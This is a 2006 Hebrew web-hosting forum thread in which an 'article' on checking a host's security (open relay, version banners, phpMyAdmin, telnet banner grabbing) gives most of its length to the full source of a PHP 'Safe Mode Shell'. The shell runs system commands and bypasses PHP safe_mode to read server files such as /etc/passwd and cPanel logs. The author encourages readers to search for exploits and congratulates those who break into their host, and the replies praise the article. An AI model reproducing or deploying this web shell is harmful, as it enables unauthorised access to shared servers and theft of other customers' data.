הוסטס - פורום אחסון האתרים הגדול בישראל

הוסטס - פורום אחסון האתרים הגדול בישראל (https://hosts.co.il/forums/index.php)
-   Off-Topic וסיקורים (https://hosts.co.il/forums/forumdisplay.php?f=48)
-   -   |מאמר| בדיקות, מתארחים בשרת בטוח? (https://hosts.co.il/forums/showthread.php?t=29350)

yaiRy 21-08-06 14:48

|מאמר| בדיקות, מתארחים בשרת בטוח?
 
אז קניתם הוסטינג לאתר שלכם,
אבל איך תדעו אם אותה חברה היא חברה בטוחה שדואגת לתחזוק השרת שלה?

תחזוק לקוי עלול לגרום לנפילות מיותרות, פריצות, ארורים ובעיקרון עלול לפגוע באתרך.

להלן כמה בדיקות פשוטות שכל אחד יכול לעשות מכל מחשב.

בדיקת Open Relay
Open Relay זאת קונפיגרציה במייל סרבר שמאפשרת לכולם לשלוח מיילים דרך ה-SMTP בשרת ( במידה והאופציה הזאת פתוחה השרת מייל יכול להיות מוצף בספאם ולהאיט את כל השרת).

למידע נוסף: http://en.wikipedia.org/wiki/Open_mail_relay
לבדיקה: http://www.spamhelp.org/shopenrelay/

בדיקת החתימה ה-http server
בדר"כ חברות דואגות להסתיר את הגירסאות של התוכנות שבהם הם משתמשים, אבל לא חסרות חברות שלא יודעות איך. חתימת האפאצ'י נותנת פרטים כמו:
גירסאת האפאצ'י, גירסאת Modssl, גירסאת ה-PHP וכו'..
כשאתה יודע איזה גירסאות יש על השרת ניתן לראות איזה חברה פעילה מבחינת עידכונים ואיזה חברה לא. במידה והאופציה של החתימה פתוחה ניתן לראות גירסאות של תוכנות בשרת ולחפש בשבילם אקספלויטים.

לבדיקה: http://www.kloth.net/services/srvinfo.php

גירסאת PHPMyAdmin
נתייחס כרגע לבעלי ה-DA שבהם ה-PHPMyAdmin פתוח לעולם הרחב..
כדי לגשת ל-PHPMyAdmin בשרת DA כל מה שצריך זה להכנס לכתובת בשרת סלאש phpmyadmin ( לדוגמא http:*/www.domain.co.il/phpmyadmin ) כשהוא מבקש יוזר וסיסמה לתת לו "בטל" והגעתם להודעת שגיאה עם גירסאת ה-PHPMyAdmin.
תבדקו לפי האתר http://www.phpmyadmin.net אם הגירסא מעודכנת, אם לא אתם מוזמנים לחפש לה אקספלויט (; .

בדיקת חתימה לתוכנות אחרות בשרת
כמו שהסברתי למעלה לשאר התוכנות יש גם חתימות שמראות את הגירסא שלהם.
איך בודקים את החתימה? פשוט וקל.
Start>run>cmd
בקונסול רושמים: telnet IP PORT.
רציתם לבדוק את הגירסאת ssh? אז תריצו את הפקודה telnet IP 22.
סיבכתי אותכם? לא נורא חפשו בגוגל סורק פורטים שתומך בחתימות וזה יעשה לכם כבר את הכל אוטומאטית.

בדיקת Safemod ופקודות מבוטלות ב-PHP
בעיקרון ה-Safemod הוא מצב שה-PHP מבטל מס' פקודות מסוכנות, אבל יש עוד הרבה פקודות מסוכנות שגם ברגע שבעל השרת הפעיל את ה-Safemod ניתן להריץ. אני לא אעבור איתכם על כל פקודה ופקודה אבל בעיקרון אם אתם רוצים לבדוק את זה להלן קוד php פשוט שבעזרתו אני מניח שפרצו למס' עסקים פה לבדיקת פקודות מבוטלות ובמידה ומס' פקודות לא מבוטלות ניתן לגלות המון דברים כיפים.

PHP קוד:

<head>
  <meta http-equiv="Content-Language" content="en-us">
  <title></title>
<body bgcolor="#000000" text="#00FF00">
<b>
<font size=-2 face=verdana color=white>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
    <font size=-2 face=verdana color=white>
    <TABLE style="BORDER-COLLAPSE: collapse" height=18 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
        <td width="990" height="18" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
        <p align="center">
        <font face="Arial">&nbsp; </font><font face="Arial" color="#1FE51A">
        Design And Programing by D3nGeR [at] HotMail [dot] CoM</font></p></td></tr></table></font></a></font></b>
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Tahoma" size="4" color="#FFFFFF">DaNgEr
SaFe M0dE ShEll v1.0</font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
        <form method="POST">
            <p align="center">Extra:
            <select size="1" name="file" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">
            <option value="/var/cpanel/accounting.log" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">View cpanel logs</option>
            <option value="/etc/httpd/conf/httpd.conf" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Apache config</option>
            <option value="/etc/passwd" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Get /etc/passwd</option>
            <option value="/etc/hosts" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Hosts</option>
            </select>
            <input type="submit" value="Go" name="B1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000"></p>
        </form>
<table border=1 width=100% style="border-style:solid; border-width:1px; color: #00FF00; background-color: #000000" bordercolorlight="#000000" bordercolordark="#000000"><tr>
<font size="4px">
<b>
    <font size=-2 face=verdana color=white>
    <td>
<font size=-2 face=verdana>
<font size="4px">
    <font face="Arial">
    <b><font size="1"><span lang="ar-sa">uname -a</span>:&nbsp;<?php echo php_uname(); ?></font></b></font><font size="1"><b><font face="Arial">&nbsp;</font></b></font></font><b> </b>

<br>
<b><span lang="ar-sa">ID:</span>:</b> <? passthru("id");?></div></td>
    </font></b>
</font>
    </tr></table>

</head>


<?php
/*
by D3nGeR
D3nger [at] Hotmail [dot] CoM
*/
$file=""// File to Include... or use _GET _POST
$tymczas=""// Set $tymczas to dir where you have 777 like /var/tmp
 
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     
$safemode true;
     
$hsafemode "<font color=\"red\">ON (secure)</font>";
    }
    else {
$safemode false$hsafemode "<font color=\"green\">OFF (not secure)</font>";}
    echo(
"Safe-mode: $hsafemode");
    
$v = @ini_get("open_basedir");
    if (
$v or strtolower($v) == "on") {$openbasedir true$hopenbasedir "<font color=\"red\">".$v."</font>";}
    else {
$openbasedir false$hopenbasedir "<font color=\"green\">OFF (not secure)</font>";}
    echo(
"<br>");
    echo(
"Open base dir: $hopenbasedir");
    echo(
"<br>");
    
$version=("Safe Mode Shell 1.5(beta)");
    echo 
"Disable functions : <b>";
    if(
''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
    
$free = @diskfreespace($dir);
    if (!
$free) {$free 0;}
    
$all = @disk_total_space($dir);
    if (!
$all) {$all 0;}
    
$used $all-$free;
    
$used_percent = @round(100/($all/$free),2);
      
error_reporting(E_WARNING);
      
ini_set("display_errors"1);



echo 
"<PRE>\n";
if(empty(
$file)){
if(empty(
$_GET['file'])){
if(empty(
$_POST['file'])){
die(
"\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">MaDe By D3nGeR
</FONT></CENTER></B>"
);
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas"cx");

if(
copy("compress.zlib://".$file$temp)){
$zrodlo fopen($temp"r");
$tekst fread($zrodlofilesize($temp));
fclose($zrodlo);
echo 
"<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n"
.htmlspecialchars($tekst)."\n<B>--- End File
"
.htmlspecialchars($file)." ---------------\n";
unlink($temp);
die(
"\n<FONT COLOR=\"RED\"><B>File
"
.htmlspecialchars($file)." has been already loaded. D3nGeR
;]</B></FONT>"
);
} else {
die(
"<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>"
.htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>"
);
}

יש עוד המון דרכים ושיטות אבל אלה בעיקרון הבסיסיות,
ברכותי למי שהצליח לפרוץ להוסטינג פרוביידר שלו (:

(מנהלים אל תצנזרו את הסקריפט PHP הוא כבר התפרסם פה כקישור לאתר)

meshuga 21-08-06 14:53

בגלל שהקוד הוא יותר איך למנוע מאשר איך לפרוץ, אני משאיר.

yaiRy 21-08-06 14:59

ציטוט:

נכתב במקור על ידי meshuga
בגלל שהקוד הוא יותר איך למנוע מאשר איך לפרוץ, אני משאיר.

בעיקרון זה בשביל לפתוח את העיינים לבעלי העסקים פה.
מי שיש לו את הביצים לפרוץ לשרת שהוא מתאחסן בו לבריאות..

TheBoy 21-08-06 15:07

רגע אני אנסה לפרוץ לשרת שלי :P חחחח

סחטיין על המאמר :)

MoshikB 21-08-06 15:11

כל הכבוד לך יאיר על ההשקעה.. תודה רבה.
אני הייתי מוסיף על עניין עדכון ה DIRECT ADMIN בנוסף למה שאמרת ל PHPMYADMIN.

yaiRy 21-08-06 15:13

ציטוט:

נכתב במקור על ידי Expert-Serv.Co.iL
כל הכבוד לך יאיר על ההשקעה.. תודה רבה.
אני הייתי מוסיף על עניין עדכון ה DIRECT ADMIN בנוסף למה שאמרת ל PHPMYADMIN.

ממ, תראה עדיין לא יצא אקספלויט ל-DA (לפחות לא אחד שאני יודע עליו) העידכונים העיקריים הם לנוחות של המשתמש ותיקון באגים קטנים לכן זה לא כזה חשוב.

Alon.R 21-08-06 15:13

יפה יאיר, תודה.
אגב יש מצב שאני שומר את המאמר ושם אותה באתר העתיד להיפתח בקרוב עם קרטיד לך?

yaiRy 21-08-06 15:16

ציטוט:

נכתב במקור על ידי Alon.R
יפה יאיר, תודה.
אגב יש מצב שאני שומר את המאמר ושם אותה באתר העתיד להיפתח בקרוב עם קרטיד לך?

תעשה איתו מה שאתה רוצה כל עוד תשאיר קרדיט (:

Alon.R 21-08-06 15:17

ציטוט:

נכתב במקור על ידי yaiR yerushalmi
תעשה איתו מה שאתה רוצה כל עוד תשאיר קרדיט (:

תודה ;P

Alm 21-08-06 19:02

אחלה מאמר יאיר, תודה רבה.


כל הזמנים הם GMT +2. הזמן כעת הוא 06:40.

מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ